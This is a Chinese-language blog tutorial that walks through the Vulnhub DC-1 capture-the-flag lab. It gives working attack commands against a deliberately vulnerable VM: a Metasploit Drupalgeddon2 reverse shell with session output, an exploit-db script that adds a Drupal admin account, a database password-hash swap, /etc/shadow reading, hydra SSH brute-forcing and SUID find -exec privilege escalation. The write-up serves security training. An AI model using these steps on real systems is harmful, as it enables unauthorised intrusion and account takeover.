这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。

作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~

文章目录

  • 一.DC-1题目描述及环境配置
    • 1.题目描述
    • 2.环境搭建
  • 二.Vulnhub靶机渗透详解
    • 1.信息收集
    • 2.CMS漏洞搜索
    • 3.Metasploit漏洞利用
    • 4.敏感信息分析获取flag1和falg2
    • 5.数据库爆破
    • 6.数据库管理员密码修改及获取flag3
    • 7.用户信息获取flag4
    • 8.提权和Hydra爆破flag5
    • 9.SSH远程登录
    • 10.suid提权
  • 三.总结

PS:本文参考了github、安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。

作者的github资源:
软件安全:https://github.com/eastmountyxz/Software-Security-Course
其他工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study


声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。

前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防御原理(一)
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防御原理(二)
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)
[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)
[网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
[网络安全自学篇] 三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识(一)
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
[网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解(CVE-2018-12613)
[网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原
[网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原
[网络安全自学篇] 四十三.木马原理详解、远程服务器IPC$漏洞及木马植入实验
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
[网络安全自学篇] 四十五.病毒详解及批处理病毒制作(自启动、修改密码、定时关机、蓝屏、进程关闭)
[网络安全自学篇] 四十六.微软证书漏洞CVE-2020-0601 (上)Windows验证机制及可执行文件签名复现
[网络安全自学篇] 四十七.微软证书漏洞CVE-2020-0601 (下)Windows证书签名及HTTPS网站劫持
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
[网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
[网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
[网络安全自学篇] 五十一.恶意样本分析及HGZ木马控制目标服务器
[网络安全自学篇] 五十二.Windows漏洞利用之栈溢出原理和栈保护GS机制
[网络安全自学篇] 五十三.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell
[网络安全自学篇] 五十四.Windows漏洞利用之基于SEH异常处理机制的栈溢出攻击及shell提取
[网络安全自学篇] 五十五.Windows漏洞利用之构建ROP链绕过DEP并获取Shell
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
[网络安全自学篇] 五十七.PE文件逆向之什么是数字签名及Signtool签名工具详解(一)
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 五十九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及shell深度提权
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
[网络安全自学篇] 六十一.PE文件逆向之数字签名详细解析及Signcode、PEView、010Editor、Asn1View等工具用法(二)
[网络安全自学篇] 六十二.PE文件逆向之PE文件解析、PE编辑工具使用和PE结构修改(三)
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
[网络安全自学篇] 六十四.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)复现及详解
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)


前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差异备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包



一.DC-1题目描述及环境配置

Vulnhub是一个特别好的渗透测试实战靶场,提供了许多带有漏洞的渗透测试虚拟机下载。作者会深入分析20多个案例来熟悉各种Web渗透工具及方法,希望能帮助到您。

1.题目描述

  • 靶场题目: DC: 1
  • 靶场地址:https://www.vulnhub.com/entry/dc-1-1,292/
  • 难度描述:包含5个Flag,初级难度,最终目标是在root主目录中找到并读取该标志
  • 靶场作者:DCAU
  • 下载地址:https://download.vulnhub.com/dc/DC-1.zip

在这里插入图片描述

Description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS. There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges. Depending on your skill level, you may be able to skip finding most of these flags and go straight for root. Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.



2.环境搭建

第一步,下载资源

在这里插入图片描述


第二步,打开VMware虚拟机安装靶场
找到我们刚才下载的文件,导入虚拟机。

在这里插入图片描述

选择存放的位置,然后点击导入。如果出现未通过OVF规范一致性或虚拟硬件合规性检查,请单击“重试”导入。

在这里插入图片描述


第三步,导入完成之后,设置NAT网络模式,内存设置为1G,硬盘设置为4GB
注意,我们需要将靶机和kali放在同一个局域网下,保证能通信。

在这里插入图片描述


第四步,点击开启虚拟机

在这里插入图片描述

此时服务器处于开启状态,开始Kali操作吧!最早我一直去找用户名和密码尝试登录,后来想这个靶场应该是让你通过其他系统来渗透的。哈哈,毕竟我也是初学者,遇到任何简单问题都理解。

在这里插入图片描述



二.Vulnhub靶机渗透详解

1.信息收集

第一步,目标IP探测
首先需要探测目标靶场的IP,推荐两种方法。

方法1:使用arp-scan命令探测目标的IP地址

  • arp-scan -l
  • 目标IP为192.168.44.144

在这里插入图片描述

方法2:使用netdiscover识别目标主机

  • netdiscover -i eth0
    作者结合自己的虚拟机识别出来IP地址为:192.168.44.144

在这里插入图片描述


第二步,端口扫描
nmap命令的基本用法如下:

  • -sS:半开扫描,记入系统日志风险小
  • -sP:扫描端口前,先使用ping扫描,保证主机存活
  • -A:全面系统检测,启用脚本检测和扫描

输入命令如下:

  • nmap -sS -T4 -A -p- 192.168.44.144

扫描结果(主机开放端口)如下,常用的端口22和88,也需要注意一些特殊的端口可能存在漏洞。

  • 22:SSH远程连接
  • 80:HTTP网站协议
  • 111:RPCBInd协议
  • 45684:敏感端口

在这里插入图片描述

注意:在信息扫描中,目录扫描是接下来的操作。但这里作者没有进行目录扫描,因为该靶场考察一个CMS漏洞利用,后续也会有目录扫描操作。



2.CMS漏洞搜索

接着我们通过IP直接访问Web服务,这是一个Drupal搭建的网站。

在这里插入图片描述

推荐使用插件Wappalyzer进行网站指纹识别,也可以发现该网站是使用Drupal CMS的管理系统。

在这里插入图片描述

我们可以尝试在网上搜索这个cms的漏洞利用方式,可以发现漏洞编号为:

  • CVE-2018-7600

在这里插入图片描述

使用AWVS进行扫描,得到该页面存在Drupal的一个漏洞CVE-2018-7600。

在这里插入图片描述



3.Metasploit漏洞利用

接下来使用metasploit工具对漏洞进行利用。

第一步,启动metasploit

  • msfconsole

在这里插入图片描述


第二步,搜索drupal模块,采用2018
搜索这个CMS在MSF中能进行利用的方法,前面我们已经查询CVE-2018-7600是常见的漏洞。如果不知道的情况下,我们就需要一个个攻击模块的尝试。

  • search drupal

在这里插入图片描述


第三步,采用最新的2018漏洞尝试攻击,配置参数

  • use exploit/unix/webapp/drupal_drupalgeddon2
  • show options:显示配置参数,其中RHOSTS是必填项

在这里插入图片描述


第四步,反弹shell

  • set RHOSTS 192.168.44.144
  • exploit
  • shell
  • ls

在这里插入图片描述


具体内容如下,注意发现了第一个文件flag1.txt。

README.txtmsf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.44.144
RHOSTS => 192.168.44.144
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit[*] Started reverse TCP handler on 192.168.44.138:4444 
[*] Sending stage (38247 bytes) to 192.168.44.144
[*] Meterpreter session 1 opened (192.168.44.138:4444 -> 192.168.44.144:33770) at 2020-04-10 22:25:12 +0800meterpreter > shell
Process 3429 created.
Channel 0 created.ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php


4.敏感信息分析获取flag1和falg2

在/var/www/下有个flag1.txt,提示我们查看配置文件。

在这里插入图片描述

虽然shell已经进入,但它并不是交互的shell,所以我们要进入交互式的shell。

  • cat flag1.txt
  • pwd
  • whoami
  • ls

在这里插入图片描述


使用python反弹一个交互式shell TTY。

  • python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

注意,drupal的配置文件是 /sites/default/settings.php ,是数据库连接配置文件。

  • cat settings.php

在这里插入图片描述

接着发现了flag2以及数据库账号密码。

在这里插入图片描述

登上数据库查看相关信息。

<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);


5.数据库爆破

由于Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看发现了flag2和数据库的账号密码,我们接着进入数据库查看。

第一步,登录数据库

  • msql -u dbuser -p
  • username => dbuser
  • password => R0ck3t
  • database => drupaldb

在这里插入图片描述


第二步,数据库基本操作

  • show database;
  • use drupaldb;
  • show tables;

在这里插入图片描述

发现用户表为users,注意Drupal框架默认的用户表就是users表。

在这里插入图片描述


第三步,查询admin用户

  • select * from users;
  • select name,pass from users;

在这里插入图片描述

发现admin账号和经过加密的密码,flag2中给的提示暴力破解不是唯一的方法

在这里插入图片描述

输出结果如下,但密码加密且不是md5方式。如何破解密码是接下来的关键。

mysql> select name,pass from users;
select name,pass from users;
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
|       |                                                         |
| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-------+---------------------------------------------------------+
3 rows in set (0.00 sec)


6.数据库管理员密码修改及获取flag3

该部分参考文章:
VulnHub::DC-1 - chalan630大佬
如何重置Drupal 7的用户密码 - xieyanxy9
忘记Drupal的管理员密码的解决办法 - drupalchina


方法一:利用PHP脚本修改管理员密码
由于很多在线MD5爆破和MD5数据库,可以查到很多MD5码的原文,所以Drupal 7已不再采用Drupal 6和5简单的MD5加密,而是采用一种新型的Hash加密方法。新型加密方法是“加了盐(Salt)”的MD5码,简单理解就是并不会直接将password进行MD5加密,而会和用户名或其它随机字符串组合在一起后再MD5加密。

第一个破解方法是利用Drupal 7安装目录的scripts目录下,有一些Drupal 7开发者准备好的PHP脚本,可以执行一些高级操作。其中有一个脚本名为password-hash.sh,它的功能是传入一个密码(字符串),即返回加密后的密码字符串。

由于Drupal 7对数据库加密的脚本位于网站根目录scripts下,利用该脚本修改为新密码123456,基本流程如下:

  • php scripts/password-hash.sh 123456

在这里插入图片描述

# php scripts/password-hash.sh 123456
php scripts/password-hash.sh 123456
password: 123456 		
hash: $S$DQrmfkgP1s7S3svvp/OdzHuGpZyt0oaIOIMuULnN6Zo.gxuq8MAu

接着我们再次登录数据库。

  • mysql -u dbuser -p

在这里插入图片描述

使用update语句修改密码,代码如下:

  • use drupaldb;
  • select name,pass from users;
  • update users set pass=’$… Zo.gxuq8MAu’ where name=‘admin’;
  • select name,pass from users;

在这里插入图片描述

对原密码进行替换,再登录web服务,得到flag3。

  • admin
  • 123456

在这里插入图片描述

主页显示如下图所示:

在这里插入图片描述

可以在People页面看到我们的管理员用户信息。

在这里插入图片描述

对应的Flag3如下图所示:

在这里插入图片描述

flag3的提示需要提升权限,使用“-exec”在shadow文件中,接下来需要先查看用户列表。

在这里插入图片描述



方法二:查找可利用漏洞,添加新管理员账户
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,第二种方法是通过该过程新增admin密码。

第一步,查看Drupal版本,确定Drupal版本为7.24

  • cat /var/www/includes/bootstrap.inc | grep VERSION

在这里插入图片描述


第二步,使用searchsploit查找可利用漏洞。攻击脚本适用于7.31以下,所以适合7.24版本。

  • searchsploit drupal

在这里插入图片描述


第三步,利用drupal7.0版本漏洞增加有admin权限的用户:eastmount

  • python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.44.144 -u eastmount -p eastmount

在这里插入图片描述

新增管理员用户如下:

在这里插入图片描述


第四步,使用新添加的用户eastmount登录网站,在content模块下找到flag3。

在这里插入图片描述

显示flag3如下:

在这里插入图片描述

flag3提示需要提升权限,使用“-exec”在shadow文件中,接下来需要先查看用户列表。

在这里插入图片描述



7.用户信息获取flag4

首先,我再带领大家回顾下整个渗透的流程。

1.metasploit反弹shellmsfconsoleuse exploit/unix/webapp/drupal_drupalgeddon2set RHOSTS 192.168.44.144exploit2.获取www-data@DC-1用户权限shellpython -c 'import pty;pty.spawn("/bin/bash")'cat /etc/passwdfind /root

在这里插入图片描述

在这里插入图片描述

flag3的提示提到了权限,于是我们尝试查看用户列表。

  • cat /etc/passwd

在这里插入图片描述

注意,/etc/passwd包含系统所有账户信息,只有超级用户才有写和访问。该文件每个用户占一行用,分隔成七个字段。如下图所示:

在这里插入图片描述

发现flag4用户,接着切换到falg4的home目录,发现flag4.txt文件。flag4提示flag in root,接下来我们需要提权。

在这里插入图片描述



8.提权和Hydra爆破flag5

我们使用find获取root权限相关的信息,如下图所示:

  • find /root

find命令是用来在指定目录下查找文件。任何位于参数之前的字符串都将被视为欲查找的目录名。如果使用该命令时,不设置任何参数,则find命令将在当前目录下查找子目录与文件,并将查找到的子目录和文件全部进行显示。

find(选项)(参数)
-exec<执行指令>:假设find指令的回传值为True,就执行该指令
-perm<权限数值>:查找符合指定的权限数值的文件或目录

发现最终flag文件,但是无权限打开,flag3中提醒需要使用“-exec”提权。

在这里插入图片描述

接着进行ROOT提权,核心步骤包括:

  • mkdir test
  • find test -exec ‘/bin/sh’ /;

在这里插入图片描述

查看/etc/shadow文件,发现flag4用户,并且flag4用户可以登录和密码。所以我们使用hydra进行爆破。

  • cat /etc/shadow

在这里插入图片描述

/etc/shadow文件存储的是/etc/passwd的密码、存放安全用户信息,格式如下:

在这里插入图片描述

接着使用hydra进行密码爆破,最终爆破用户和密码为:flag4、orange。

  • hydra -l flag4 -P passwords.txt ssh://192.168.44.144
  • -l:指定用户名
  • -P:加载自定义密码字典
  • ssh://ip:指定使用协议和ip地址

在这里插入图片描述

注意,hydra爆破海量密码比较耗时,所以拥有一些好的字典非常重要。

在这里插入图片描述

最终结果为:

  • login: flag4
  • password: orange

在这里插入图片描述



9.SSH远程登录

接着使用flag4用户进行ssh远程登录系统。

  • ssh flag4@192.168.199.203
  • 密码: orange

在这里插入图片描述

前面在flag4中提示root根目录,接着进入到根目录/root下找到thefinalflag.txt文本。

在这里插入图片描述

最终五个flag全部找到,游戏结束!DC-1这个靶场的综合性挺强的,也非常有趣。

在这里插入图片描述


注意,我们也可以直接利用find和-exec获取最终的flag。

  • touch test
  • find test -exec whoami ;
  • find test -exec cat /root/thefinalflag.txt ;

在这里插入图片描述

在这里插入图片描述



10.suid提权

什么是suid?
通俗的理解是其他用户执行这个程序的时候可以用该程序所有者/组的权限。suid提权可以理解为某个文件有s标志,并且它输入root,当我们运行这个程序时就可以有root的权限,并且这个程序还能执行命令,那么我们就能从普通用户提升到root权限。常见suid提权的命令包括nmap、vim、find、bash等。

下面补充下suid提权方法,前面我们的www-data权限很低,通常拿到网站需要进行提权。找到一个属于root有s权限的文件。

  • find / -user root -perm 4000 -print 2>/dev/null
  • find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

查看find的权限为root。

  • cd /usr/bin
  • ls -l find

在这里插入图片描述

root提权。

  • mkdir test
  • find test -exec ‘/bin/sh’ /;
  • whoami

在这里插入图片描述

接下来开始寻找flag,比如进入home目录发现flag4文件。

在这里插入图片描述


这文件存储的是/etc/passwd的密码、存放安全用户信息。
在这里插入图片描述


三.总结

写道这里,这篇文章讲解完毕,后续会更深入的分享。DC-1的渗透流程如下:

  • 信息收集
    (1) 目标IP探测 (arp-scan、netdiscover)
    (2) Nmap端口扫描
  • CMS漏洞搜索
    (1) Wappalyzer识别Drupal CMS管理系统
    (2) 搜索Drupal漏洞编号CVE-2018-7600
  • Metasploit漏洞利用反弹shell
    (1) 搜索drupal漏洞
    (2) msf使用漏洞并配置参数
    (3) 反弹shell
  • 敏感信息分析
    (1) 敏感信息获取flag1
    (2) python反弹交互式shell python -c ‘import pty;pty.spawn("/bin/bash")’
    (3) 获取flag和数据库账号密码
  • 数据库爆破
    (1) 登录数据库 msql -u dbuser -p
    (2) 查看用户表users
    (3) 发现admin用户和密码,但密码加密
  • 数据库管理员密码获取
    (1) 修改管理员密码 php scripts/password-hash.sh 123456
    (2) 数据库update更新密码 update users set pass=‘MD5(123456)’ where name=‘admin’;
    (3) 登录网站获取flag3
    (4) 利用漏洞和Python脚本新增用户 searchsploit drupal
    (5) python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.44.144 -u eastmount -p eastmount
  • 提权和Hydra爆破
    (1) 用户信息获取flag4 cat /etc/passwd
    (2) ROOT提权 find test -exec ‘/bin/sh’ /;
    (3) hydra爆破密码 hydra -l flag4 -P passwords.txt ssh://192.168.44.144
  • SSH远程登录
  • suid提权,常见root提权命令
    (1) find test -exec cat /root/thefinalflag.txt ;
    (2) find test -exec ‘/bin/sh’ /
    (3) find / -user root -perm -4000 -print 2>/dev/null
    (4) find / -perm -u=s -type f 2>/dev/null
    (5) find / -user root -perm -4000 -exec ls -ldb {} ;

希望这系列文章对您有所帮助,真的感觉自己技术好菜,要学的知识好多。转眼4月份到来,这是第66篇原创的安全系列文章,从网络安全到系统安全,从木马病毒到后门劫持,从恶意代码到溯源分析,从渗透工具到二进制工具,还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防,人生漫漫其路远兮,作为初学者,自己真是爬着前行;同时学术论文得深入了,加油!感谢很多人的帮助,继续爬着,继续加油!

欢迎大家讨论,是否觉得这系列文章帮助到您!任何建议都可以评论告知读者,共勉。

(By:Eastmount 2020-04-11 晚上10点写于贵阳 http://blog.csdn.net/eastmount/)


参考文献:
[1] VulnHub-DC-1靶机渗透测试 - MzHeader
[2] VulnHub::DC-1 - chalan630
[3] Vulnhub靶机渗透测试实战(一):DC-1(入门) - Jenny_Zhx
[4] Vulnhub系列:DC-1 - capelthwaite
[5] (vulnhub靶机)DC-1 - 深信服TraveNight
[6] VulnHub测试靶场DC-1 - wx5c99daab1f230
[7] Vulnhub DC-1靶机渗透学习 - This-is-Y
[8] 如何重置Drupal 7的用户密码 - xieyanxy9
[9] https://cybrary.in/dc-1-1-vulnhub-walkthrough/

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. Arm学习

    怎么学ARM如果你想学好ARM就得先熟悉整一个linux系统的操作以及架构 待你熟悉之后必须学好C语言还有ui编程(个人推荐QT) 一切具备之后,你就开始学习ARM的开发板(新手从mini2440或者三星2440) 初学的要懂 交叉编译连 uboot 等 然后往深层次的是驱动编程 书籍有很多如果推…...

    2024/3/14 10:45:17
  2. ORACLE SQL性能优化No2

    oracle SQL性能优化 我们要做到不但会写SQL,还要做到写出性能优良的SQL,以下为笔者学习、摘录、并汇总部分资料与大家分享! (1) 选择最有效率的表名顺序(只在基于规则的优化器中有效): ORACLE的解析器按照从右到左的顺序处理FROM子句中的表名,FROM子句中写在最后的表…...

    2024/3/14 16:50:05
  3. csdn博客登录

    第一步: 需要引入以下框架 // 需要引入框架: 1. SystemConfiguration.framework 2. CoreGraphics.framework 3. libsqlite3.dylib 4. CoreTelephony.framework 5. libstdc++.dylib, 6. libz.dyli 第二步: 下载最新的SDK 下载SDK链接,http://dev.umeng.com/social/ios/sdk-d…...

    2024/3/14 16:50:04
  4. “易语言.飞扬”十分钟入门教程

    “易语言.飞扬”十分钟入门教程 作者:liigo 2007.1.1 原文链接:http://blog.csdn.net/liigo/archive/2007/01/01/1472077.aspx 转载必须注明出处:http://blog.csdn.net/liigo第 1 分钟:序曲 第 2 分钟:“易语言.飞扬”初相识 第 3 分钟:第一个程序 第 4 分钟:第一个类库…...

    2024/3/14 16:50:03
  5. 我的ARM学习经历

    下面介绍我的学习经历: 1、基础阶段话说07年第一份工作从事的是PLC开发,用protel画原理图和PCB,写AVR单片机程序,焊焊板子,还去过华强北买器件,比较杂,但是接触面比较广,为进一步学ARM打下了基础。 期间不甘心只停留在AVR单片机层次,买了邵贝贝的《uCOS-II嵌入式操作系…...

    2024/3/14 16:50:04
  6. springboot +jpa + security 博客系统

    写在最前面 演示站点:blog.ydemo.cn 开源中国码云项目源码:https://git.oschina.net/oneper/base/tree/dev/ 有兴趣的同学可以把源码荡下来,然后部署war包至自己的服务器,如何打包,绑定域名等一系列操作查看本人近期博客,记录了遇到的问题,如果您有问题,欢迎留言。 引言…...

    2024/3/21 12:22:47
  7. MVC : Html.DropDownListFor 的用法

    1. 直接在页面初始化 @Html.DropDownListFor(model => model.Status, new SelectList(new string[] {"正常", "暂停销售"}))2. 从数据库中读取 Text Value http://code-inside.de/blog-in/2010/12/25/howto-apply-mvc2-html-dropdownlistfor/5. 与 enum…...

    2024/3/14 16:50:00
  8. Linux设备没有空间,rm删不了文件

    当找到的目录中存在上百万文件时 rm 是无法一次性删除的,可以使用rsync命令来删除: rsync --delete -a -H -v /tmp/del_path/ /val/logs/ #删除/val/logs/下所有文件...

    2024/3/14 16:49:59
  9. 红黑树 reb-black tree(ngnix实现接口分析)

    比较好的介绍:https://baijiahao.baidu.com/s?id=1641940303518144126&wfr=spider&for=pc红黑树是自平衡二叉查找树。一、特性:1. 节点只有2种颜色:红色或者黑色2. 根节点必须是黑色3. 每个叶子的节点都是黑色的空节点(NULL)4. 每个红色节点的两个子节点都是黑色…...

    2024/3/14 16:49:58
  10. 图像标注工具labelImg安装及使用教程,制作voc数据集

    本教程主要针对在faster rcnn上训练自己的数据集,制作pascal VOC格式的数据集(当然如果嫌弃下面方法太麻烦的话,直接下载exe文件,打开就可以直接使用,简直不要太简便)安装环境:win10 + Python 3.5.1安装步骤:1、labelImg源码下载地址:https://github.com/tzutalin/lab…...

    2024/3/14 16:49:57
  11. ARM 学习笔记整理(一)

    ARM 学习笔记整理,主要用于将来的研究开发参考。一、ARM体系结构的版本处理器的体系结构就是其使用的指令集,而通常我们说的Soc结构的处理器可以理解为一个实现机器指令集的硬件内核,在这个内核周围集成各种功能模块,比如:图像处理、通信处理等模块,然后将这些全部封装在…...

    2024/3/14 16:49:58
  12. 高仿CSDN社区树形图

    一直感觉CSDN社区的树形结构特别的人性化,直观化。最近做系统的时候需要用到这个树形结构,于是模仿CSDN的树形结构做了一个自己的树形结构,将实现过程记录如下,希望对读者有用。工欲善其事必先利其器,要模仿一个经典的树形结构就应该参照人家是怎么实现的,这里用到了fire…...

    2024/3/14 16:49:55
  13. Django开发自己的博客系统

    好久之前就想做一下自己的博客系统了,但是在网上查了查好像是需要会一些Node.js的相关知识,而且还要安装辣么多的库什么的,就不想碰了。但是我遇到了Django这么一款神器,没想到我的博客系统就这么建立起来了。虽然是最基础的类型。但是也算是成功了,这篇博客比较适合对Dja…...

    2024/3/14 16:49:54
  14. github部分开源安全工具合集

    本文来自 SONBYN 的CSDN 博客 ,全文地址请点击: https://blog.csdn.net/sonbyn001/article/details/72782720?utm_source=copy Scanners-Box是来自github平台的开源扫描仪的集合,包括子域枚举,数据库漏洞扫描程序,弱密码或信息泄漏扫描仪,端口扫描仪,指纹扫描仪和其他大…...

    2024/3/14 16:49:53
  15. 解决ASP.NET MVC4中使用Html.DropDownListFor显示枚举值默认项问题

    从ASP.NET MVC 5开始,Html.DropDownListFor已经提供了对Enum的支持,但在这以前,需要通过帮助方法或扩展方法来让Html.DropDownListFor显示枚举值。 本篇解决在ASP.NET MVC 4 下Html.DropDownListFor显示默认项的问题。 以上,使用Select是通过Html.DropDownListFor来…...

    2024/3/14 16:49:54
  16. SQL Server 在代码级别实现导入导出功能

    解决excel表数据截断问题Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\Engines\Excel]"TypeGuessRows"=dword:00000000[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Access Connectivity Engine\Engines\Excel]&quo…...

    2024/3/14 16:49:53
  17. 中文词性对照表 & 英文词性对照表_CodingPark编程公园

    中文词性对照表代码 名称 帮助记忆的诠释Ag 形语素 形容词性语素。形容词代码为a,语素代码g前面置以A。a 形容词 取英语形容词adjective的第1个字母。ad 副形词 直接作状语的形容词。形容词代码a和副词代码d并在一起。an 名形词 …...

    2024/3/13 22:21:58
  18. 博客系统架构对比分析

    博客系统架构对比分析 新浪博客系统架构(http://blog.sina.com.cn): web服务器:nginx+apache cgi:php 博客应用服务器: 猜测是c++, memcachdb. 存储系统:mysql 发表最简单的一篇博客(内容在100字以内), 花了2.77秒。 调用接口:http://control.blog.sina.com.cn/admin/a…...

    2024/3/27 1:01:01
  19. Git下载、安装

